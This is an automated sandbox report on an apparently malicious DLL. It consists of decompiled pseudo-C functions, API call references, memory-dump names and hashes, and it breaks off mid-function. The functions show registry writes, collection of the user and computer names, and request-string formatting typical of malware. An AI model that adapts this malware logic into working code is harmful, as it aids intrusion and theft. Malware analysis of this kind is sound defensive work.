Uniqueness Score: -1.00%

Function 02E35E6F Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02E35EC9
SysAllocString.OLEAUT32(0070006F), ref: 02E35EDD
SysAllocString.OLEAUT32(00000000), ref: 02E35EEF
SysFreeString.OLEAUT32(00000000), ref: 02E35F57
SysFreeString.OLEAUT32(00000000), ref: 02E35F66
SysFreeString.OLEAUT32(00000000), ref: 02E35F71

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 2e043dbcab4d1e73fb7d34e1b9b2d473717b0f2bb663942f7e11d73228438604
Instruction ID: 9406c62020b0d6934a47ed36e4a97fb1d17107a61d59c4103838191004c5cd27
Opcode Fuzzy Hash: 2e043dbcab4d1e73fb7d34e1b9b2d473717b0f2bb663942f7e11d73228438604
Instruction Fuzzy Hash: B4418232D40609AFDB02DFB9D848AAFB7BAEF49305F548426E911EB210DB71DA05CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02E32331 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02E32331(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2e3a3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E02E33D2E( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02E32087(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02E3789E(_a8);
						goto L29;
					}
					_t64 =  *0x2e3a318; // 0x4ea9dc0
					_t16 = _t64 + 0xc; // 0x4ea9ee2
					_t65 = E02E33D2E(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02e390
						if(E02E36BEB(_t97,  *_t33, _t91, _a8,  *0x2e3a3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2e3a348; // 0x206d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2e3ba3e; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2e3ba39; // 0x55434b48
								_t69 = _t34;
							}
							if(E02E341C5(_t69,  *0x2e3a3d4,  *0x2e3a3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2e3a348; // 0x206d5a8
									_t44 = _t71 + 0x2e3b842; // 0x74666f53
									_t73 = E02E33D2E(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02e390
										E02E3187F( *_t47, _t91, _a8,  *0x2e3a3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d02e390
										E02E3187F( *_t49, _t91, _t99,  *0x2e3a3d0, _a16);
										E02E3789E(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02e390
									E02E3187F( *_t40, _t91, _a8,  *0x2e3a3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d02e390
									E02E3187F( *_t43, _t91, _a8,  *0x2e3a3d0, _a16);
								}
								if( *_t101 != 0) {
									E02E3789E(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02e390
					_t81 = E02E378B3( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02e390
							E02E36BEB(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02E3789E(_t100);
						_t98 = _a16;
					}
					E02E3789E(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02E37A86(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2e3a3dc);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02e32331
0x02e3233a
0x02e32341
0x02e32346
0x02e323b3
0x02e323b9
0x02e323be
0x02e323c5
0x02e323ca
0x02e323cf
0x02e3253a
0x02e32541
0x02e32541
0x02e32546
0x02e32548
0x02e32548
0x02e32551
0x02e32551
0x02e323d5
0x02e323e1
0x02e32530
0x02e32533
0x00000000
0x02e32533
0x02e323e7
0x02e323ec
0x02e323ef
0x02e323f4
0x02e323f9
0x02e32442
0x02e32442
0x02e32455
0x02e3245f
0x02e32465
0x02e3246c
0x02e32476
0x02e32476
0x02e3246e
0x02e3246e
0x02e3246e
0x02e3246e
0x02e32498
0x02e324a0
0x02e324ce
0x02e324d3
0x02e324da
0x02e324df
0x02e324e3
0x02e32515
0x02e324e5
0x02e324f2
0x02e324f5
0x02e32505
0x02e32508
0x02e3250e
0x02e3250e
0x02e324a2
0x02e324af
0x02e324b2
0x02e324c4
0x02e324c7
0x02e324c7
0x02e3251f
0x02e3252b
0x02e32521
0x02e32524
0x02e32524
0x02e3251f
0x02e32498
0x00000000
0x02e3245f
0x02e32408
0x02e3240b
0x02e32412
0x02e32418
0x02e3241b
0x02e3241d
0x02e32429
0x02e3242c
0x02e3242c
0x02e32432
0x02e32437
0x02e32437
0x02e3243d
0x00000000
0x02e3243d
0x02e3234b
0x00000000
0x02e32372
0x02e32372
0x02e3237e
0x02e32391
0x02e32397
0x02e3239f
0x00000000
0x02e3239f

APIs

StrChrA.SHLWAPI(02E368B1,0000005F,00000000,00000000,00000104), ref: 02E32364
lstrcpy.KERNEL32(?,?), ref: 02E32391

Part of subcall function 02E33D2E: lstrlen.KERNEL32(?,00000000,04EA9DC0,00000000,02E3695F,04EA9FE3,69B25F44,?,?,?,?,69B25F44,00000005,02E3A00C,4D283A53,?), ref: 02E33D35
Part of subcall function 02E33D2E: mbstowcs.NTDLL ref: 02E33D5E
Part of subcall function 02E33D2E: memset.NTDLL ref: 02E33D70

Part of subcall function 02E3187F: lstrlenW.KERNEL32(?,?,?,02E324FA,3D02E390,80000002,02E368B1,02E31629,74666F53,4D4C4B48,02E31629,?,3D02E390,80000002,02E368B1,?), ref: 02E318A4

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

lstrcpy.KERNEL32(?,00000000), ref: 02E323B3

Strings

\, xrefs: 02E32397
(, xrefs: 02E32414

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 1136a7130567c60363c47a69db1aa3cc3044fed56900f09a5219612ff1fad1eb
Instruction ID: 12fa83a4d111ad8ea4efcfa022dc7e92ca1bb0d051bbd1b12fa8d0e0ff8c22e8
Opcode Fuzzy Hash: 1136a7130567c60363c47a69db1aa3cc3044fed56900f09a5219612ff1fad1eb
Instruction Fuzzy Hash: 36515872580209BBCF229F61DC58EAA7BBAEB04316F00D528FA9596120D731DE60DF11

Uniqueness

Uniqueness Score: -1.00%

Function 02E3731D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E02E3731D() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2e3a3cc; // 0x4ea9600
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2e3a3cc; // 0x4ea9600
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2e3a3cc; // 0x4ea9600
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2e3b827) {
					HeapFree( *0x2e3a2d8, 0, _t10);
					_t7 =  *0x2e3a3cc; // 0x4ea9600
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x02e3731d
0x02e37326
0x02e37336
0x02e37336
0x02e3733b
0x02e37340
0x00000000
0x00000000
0x02e37330
0x02e37330
0x02e37342
0x02e37347
0x02e3734b
0x02e3735e
0x02e37364
0x02e37364
0x02e3736d
0x02e3736f
0x02e37373
0x02e37379

APIs

RtlEnterCriticalSection.NTDLL(04EA95C0), ref: 02E37326
Sleep.KERNEL32(0000000A), ref: 02E37330
HeapFree.KERNEL32(00000000), ref: 02E3735E
RtlLeaveCriticalSection.NTDLL(04EA95C0), ref: 02E37373

Strings

Uqt, xrefs: 02E3735E

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uqt
API String ID: 58946197-2320327147
Opcode ID: 4e6e09ca4873c98e6af8249127b279ffe40f1906ab330a14a9fb3ff2469562a6
Instruction ID: bf88552e7d14201be05855ed5a58223d806718f35566e5e7268cdfcc6b412780
Opcode Fuzzy Hash: 4e6e09ca4873c98e6af8249127b279ffe40f1906ab330a14a9fb3ff2469562a6
Instruction Fuzzy Hash: ABF0DAB8AC42059FE7158B56D89DB29B7F4AB44707B44A828ED42C7391C774ACE0CE10

Uniqueness

Uniqueness Score: -1.00%

Function 02E33ACA Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E33ACA() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x775ec742
						_v12 = _v12 + _t11;
						_t64 = E02E37A71(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02E3789E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2e33764
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02e33ad8
0x02e33adb
0x02e33ade
0x02e33ae4
0x02e33ae9
0x02e33aef
0x02e33af7
0x02e33afa
0x02e33b00
0x02e33b05
0x02e33b0e
0x02e33b12
0x02e33b1f
0x02e33b23
0x02e33b25
0x02e33b29
0x02e33b2c
0x02e33b3c
0x02e33b8f
0x02e33b90
0x02e33b3e
0x02e33b43
0x02e33b44
0x02e33b49
0x02e33b4c
0x02e33b5f
0x00000000
0x02e33b61
0x02e33b64
0x02e33b69
0x02e33b77
0x02e33b7a
0x02e33b80
0x02e33b85
0x00000000
0x02e33b87
0x02e33b87
0x02e33b8a
0x02e33b8a
0x02e33b85
0x02e33b5f
0x02e33b95
0x02e33b96
0x02e33b05
0x02e33b9c

APIs

GetUserNameW.ADVAPI32(00000000,02E33762), ref: 02E33ADE
GetComputerNameW.KERNEL32(00000000,02E33762), ref: 02E33AFA

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

GetUserNameW.ADVAPI32(00000000,02E33762), ref: 02E33B34
GetComputerNameW.KERNEL32(02E33762,775EC740), ref: 02E33B57
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02E33762,00000000,02E33764,00000000,00000000,?,775EC740,02E33762), ref: 02E33B7A

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 47eee9078c7febd2c5ff736739f431dd5a8fc25d65e112f3368df196928bc5f9
Instruction ID: c95a8fb293a7d4e8f0b106f5030defa248897d67ada04859163cc94af9a449c4
Opcode Fuzzy Hash: 47eee9078c7febd2c5ff736739f431dd5a8fc25d65e112f3368df196928bc5f9
Instruction Fuzzy Hash: 9521C7B6940208EFDB11EFE9D989CEEBBB9AF44305B5084AAE501E7240D7309F44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E364A2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E02E364A2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				intOrPtr _t30;
				intOrPtr _t34;
				intOrPtr* _t42;
				void* _t43;
				void* _t46;
				intOrPtr* _t48;
				void* _t49;
				intOrPtr _t51;

				_t42 = _a16;
				_t48 = __eax;
				_t22 =  *0x2e3a348; // 0x206d5a8
				_t2 = _t22 + 0x2e3b67a; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
				if( *0x2e3a2ec >= 5) {
					_t30 = E02E33643(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
					L5:
					_a4 = _t30;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x2e3a2ec =  *0x2e3a2ec + 1;
						L10:
						return _a4;
					}
					_t50 = _a16;
					 *_t48 = _a16;
					_t49 = _v8;
					 *_t42 = E02E37194(_t50, _t49);
					_t34 = E02E31EDF(_t49, _t50);
					if(_t34 != 0) {
						 *_a8 = _t49;
						 *_a12 = _t34;
						if( *0x2e3a2ec < 5) {
							 *0x2e3a2ec =  *0x2e3a2ec & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E02E314C6();
					HeapFree( *0x2e3a2d8, 0, _t49);
					goto L9;
				}
				_t51 =  *0x2e3a3e0; // 0x4ea9bc8
				if(RtlAllocateHeap( *0x2e3a2d8, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t30 = E02E36CA4(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
				goto L5;
			}

0x02e364a9
0x02e364b0
0x02e364b4
0x02e364b9
0x02e364c4
0x02e364d4
0x02e36523
0x02e36528
0x02e36528
0x02e3652b
0x02e3652f
0x02e36569
0x02e36569
0x02e3656f
0x02e36576
0x02e36576
0x02e36531
0x02e36534
0x02e36536
0x02e36543
0x02e36545
0x02e3654c
0x02e36583
0x02e36588
0x02e3658a
0x02e3658c
0x02e3658c
0x00000000
0x02e3658a
0x02e3654e
0x02e36555
0x02e36563
0x00000000
0x02e36563
0x02e364d6
0x02e364f1
0x02e3650b
0x00000000
0x02e3650b
0x02e36504
0x00000000

APIs

wsprintfA.USER32 ref: 02E364C4
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02E364E9

Part of subcall function 02E36CA4: GetTickCount.KERNEL32 ref: 02E36CBB
Part of subcall function 02E36CA4: wsprintfA.USER32 ref: 02E36D08
Part of subcall function 02E36CA4: wsprintfA.USER32 ref: 02E36D25
Part of subcall function 02E36CA4: wsprintfA.USER32 ref: 02E36D47
Part of subcall function 02E36CA4: wsprintfA.USER32 ref: 02E36D6E
Part of subcall function 02E36CA4: wsprintfA.USER32 ref: 02E36D8F
Part of subcall function 02E36CA4: wsprintfA.USER32 ref: 02E36DBA
Part of subcall function 02E36CA4: HeapFree.KERNEL32(00000000,?), ref: 02E36DCD

HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02E36563

Strings

Uqt, xrefs: 02E36563

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: wsprintf$Heap$Free$AllocateCountTick
String ID: Uqt
API String ID: 1307794992-2320327147
Opcode ID: a3b0cb5e24c3009012ef64a86f36b4630a8d6a76ef2b561663fa7879d6a81400
Instruction ID: 88ee3b5f12f0de3347198f793d3a9399c0f3894e0262a03faf7feec48ae9e181
Opcode Fuzzy Hash: a3b0cb5e24c3009012ef64a86f36b4630a8d6a76ef2b561663fa7879d6a81400
Instruction Fuzzy Hash: 9C315C72980108FBCB02DFA5D88CEDA3BBDFB48306F109826F90597210D7319994CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02E355F9 Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02E355F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x2e3a348; // 0x206d5a8
					_t5 = _t103 + 0x2e3b038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2e39284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2e3a348; // 0x206d5a8
												_t28 = _t109 + 0x2e3b0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2e3a348; // 0x206d5a8
														_t33 = _t79 + 0x2e3b078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02e355fe
0x02e35607
0x02e35608
0x02e3560c
0x02e35612
0x02e35618
0x02e35621
0x02e35627
0x02e35631
0x02e35633
0x02e35639
0x02e3563e
0x02e35649
0x02e3564f
0x02e35654
0x02e35776
0x02e3565a
0x02e3565a
0x02e35667
0x02e3566d
0x02e35673
0x02e35677
0x02e3567d
0x02e3568a
0x02e3568e
0x02e35694
0x02e35697
0x02e3569f
0x02e356a0
0x02e356a4
0x02e356a8
0x02e356ab
0x02e356ae
0x02e356b4
0x02e356bd
0x02e356c3
0x02e356c4
0x02e356c7
0x02e356c8
0x02e356c9
0x02e356d1
0x02e356d2
0x02e356d3
0x02e356d5
0x02e356d9
0x02e356dd
0x00000000
0x00000000
0x02e356e3
0x02e356ec
0x02e356f2
0x02e356fc
0x02e35700
0x02e35702
0x02e3570f
0x02e35713
0x02e3571b
0x02e35720
0x02e35732
0x02e35734
0x02e3573a
0x02e3573a
0x02e35743
0x02e35743
0x02e35745
0x02e3574b
0x02e3574b
0x02e3574e
0x02e35754
0x02e35757
0x02e35760
0x00000000
0x00000000
0x00000000
0x02e35760
0x02e356b4
0x02e356ae
0x02e35697
0x02e35766
0x02e35766
0x02e3576c
0x02e3576c
0x02e35772
0x02e35772
0x02e3577b
0x02e35781
0x02e35781
0x02e3563e
0x02e3578a

APIs

SysAllocString.OLEAUT32(02E39284), ref: 02E35649
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02E3572A
SysFreeString.OLEAUT32(00000000), ref: 02E35743
SysFreeString.OLEAUT32(?), ref: 02E35772

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 0f454a2371423a9ed0feaa4f56a33f5be04261c902dd76707fb02b9aba050d24
Instruction ID: 3e39e0cd8eafdd6e0cedc8397656e3866f7be9d4b5a882e6e52fc702ac8cb214
Opcode Fuzzy Hash: 0f454a2371423a9ed0feaa4f56a33f5be04261c902dd76707fb02b9aba050d24
Instruction Fuzzy Hash: 30515E75D40609EFCB11DFA8C4889AEB7B6FF88706B548598E915EB310D7319D41CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E31335 Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02E31370
SysFreeString.OLEAUT32(00000000), ref: 02E31455

Part of subcall function 02E355F9: SysAllocString.OLEAUT32(02E39284), ref: 02E35649

SafeArrayDestroy.OLEAUT32(00000000), ref: 02E314A8
SysFreeString.OLEAUT32(00000000), ref: 02E314B7

Part of subcall function 02E343F6: Sleep.KERNEL32(000001F4), ref: 02E3443E

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: b37a62d22bc356ad2c5f90ed74168720c7f434bfd39397e59a4971ddd3cdd366
Instruction ID: e2007508add6b7c4144be8fd452b805809a40e8601701bef417481acb8a61e91
Opcode Fuzzy Hash: b37a62d22bc356ad2c5f90ed74168720c7f434bfd39397e59a4971ddd3cdd366
Instruction Fuzzy Hash: BD516F35940609AFDB12CFA8C848AEEB7B6FF88715F148828E519DB210DB71DD45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02E319D1 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02E319D1(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02E343E5(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02E317D5(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02E34376(_t101,  &_v428, _a8, _t96 - _t81);
					E02E34376(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E02E317D5(_t101, 0x2e3a1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
